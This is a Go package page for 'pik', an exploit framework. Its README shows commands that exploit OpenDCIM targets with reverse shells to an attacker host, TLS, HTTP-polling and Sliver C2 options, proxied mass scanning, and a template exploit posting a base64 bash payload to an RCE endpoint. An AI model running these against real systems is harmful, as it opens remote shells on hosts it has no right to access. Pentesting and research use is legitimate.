pik

module
v0.2.0 Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Mar 2, 2026 License: AGPL-3.0

README

pik

Go exploit framework. Write exploits once, run them as standalone binaries or inside the framework with an interactive console.

Install

go install github.com/Chocapikk/pik/cmd/pik@latest

Or self-update an existing install:

pik update

Usage

pik console                              # Interactive console
pik run opendcim -t target -s LHOST=ip   # Run an exploit
pik check opendcim -t target             # Check only
pik info opendcim                        # Module details + dorks
pik build opendcim -o opendcim           # Standalone binary
pik list                                 # List all modules

Console

pik > use opendcim
pik exploit/http/linux/opendcim > show options
pik exploit/http/linux/opendcim > set TARGET http://target
pik exploit/http/linux/opendcim > set RPORT 8080
pik exploit/http/linux/opendcim > set LHOST 10.0.0.1
pik exploit/http/linux/opendcim > check
pik exploit/http/linux/opendcim > exploit
>> Session 1 opened (10.0.0.2:49326)
www-data@target:~$ ^Z
>> Session 1 backgrounded
pik exploit/http/linux/opendcim > sessions
pik exploit/http/linux/opendcim > kill 1

Commands: use, back, show options|advanced|payloads|targets|modules, set, unset, target, check, exploit, sessions, kill, search, info, resource, list, rank, help.

Ctrl+Z backgrounds a session. resource exploit.rc runs commands from a file. History persists across sessions.

C2 backends

Three built-in backends, plus Sliver integration:

# TCP reverse shell (default)
pik run opendcim -t target -s LHOST=ip

# TLS encrypted
pik run opendcim -t target -s LHOST=ip -s C2=sslshell

# HTTP polling (firewall bypass)
pik run opendcim -t target -s LHOST=ip -s C2=httpshell -s PAYLOAD=reverse_php_http

# Sliver C2
pik run opendcim -t target -s LHOST=ip -s C2=sliver -s C2CONFIG=~/.sliver/configs/operator.cfg

Scanning

pik check opendcim -f targets.txt -t 50 -o vulnerable.txt
pik check opendcim -f targets.txt -t 50 -o results.json --json

Supports HTTP/SOCKS5 proxy with -s PROXIES=socks5://127.0.0.1:1080.

Standalone binaries

Any module can be compiled into a self-contained binary (~6 MB) with check, exploit, scanner, and reverse shell listener built in:

pik build opendcim -o opendcim
./opendcim --help
./opendcim -t target -s LHOST=10.0.0.1                      # Exploit
./opendcim -t target --check                                 # Check only
./opendcim -f targets.txt --threads 50 -o vulns.txt --check  # Mass scan

All module options are passed via -s KEY=VALUE. Run --help to see available options.

Write your own exploit

package main

import (
    "github.com/Chocapikk/pik/sdk"
    _ "github.com/Chocapikk/pik/pkg/cli"
)

type MyExploit struct{ sdk.Pik }

func (m *MyExploit) Info() sdk.Info {
    return sdk.Info{
        Description: "My exploit",
        Authors:     []string{"you"},
        Reliability: sdk.Typical,
        Targets:     []sdk.Target{sdk.TargetLinux("amd64")},
    }
}

func (m *MyExploit) Check(run *sdk.Context) (sdk.CheckResult, error) {
    resp, err := run.Send(sdk.Request{Path: "vulnerable.php"})
    if err != nil {
        return sdk.Unknown(err)
    }
    if resp.ContainsAny("marker") {
        return sdk.Vulnerable("marker found")
    }
    return sdk.Safe("not vulnerable")
}

func (m *MyExploit) Exploit(run *sdk.Context) error {
    cmd := run.CommentTrail(run.Base64Bash(run.Payload()))
    _, err := run.Send(sdk.Request{
        Method: "POST",
        Path:   "rce.php",
        Form:   sdk.Values{"cmd": {cmd}},
    })
    return err
}

func main() {
    sdk.Run(&MyExploit{})
}

go build -o myexploit .
./myexploit -t http://target -s LHOST=10.0.0.1

Supply chain security

Release binaries are signed with minisign. pik update verifies the signature and checksum before replacing itself. The signing public key is embedded in the binary.

Build from source

make build                   # Dev build
make build VERSION=1.0.0     # Versioned build
make static                  # Static binary (CGO_ENABLED=0)
make install                 # Install to $GOPATH/bin
make test                    # Run tests
make vet                     # Lint

License

AGPL-3.0. Free to use for pentesting, research, CTFs, and internal security work. If you build a commercial product or service on top of pik, the AGPL requires you to open-source your entire codebase. Contact the author for commercial licensing.

Directories

Path Synopsis
cmd
pik command
examples
standalone command
Package modules imports all exploit modules and C2 backends so they self-register via init().
 Package modules imports all exploit modules and C2 backends so they self-register via init().
exploit/http/linux
exploit/http/multi
pkg
c2
c2/httpshell
c2/session
c2/shell
c2/sliver
c2/sslshell
cli
cmdstager
console
encode
http
lab
log
Package log provides zero-dependency colored terminal output.
 Package log provides zero-dependency colored terminal output.
output
payload
runner
sigutil
stager
Package stager generates TCP stager binaries at runtime.
 Package stager generates TCP stager binaries at runtime.
text
toolchain
Package toolchain manages the Go compiler for building standalone exploits.
 Package toolchain manages the Go compiler for building standalone exploits.

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.